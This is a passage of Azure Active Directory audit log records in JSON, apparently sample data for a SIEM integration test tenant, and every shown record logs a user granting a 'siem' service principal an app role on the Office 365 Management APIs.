"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", 
"Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:05.9992570Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795878"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": 
"env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "41c7d7a7-ce53-4696-aa78-37c451a95fe1"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:05", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": 
"71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": 
"Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:05.9242333Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795815"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "14f7e7eb-0fd1-4f89-bda8-642d035f3541"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:05", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": 
"1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": 
"1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:05.9992570Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795878"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", 
"Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "41c7d7a7-ce53-4696-aa78-37c451a95fe1"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:05", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": 
"", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": 
"[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:05.9242333Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795815"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "14f7e7eb-0fd1-4f89-bda8-642d035f3541"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:05", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 
2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", 
"Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:05.9992570Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795878"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, 
{"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "41c7d7a7-ce53-4696-aa78-37c451a95fe1"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:05", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": 
"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": 
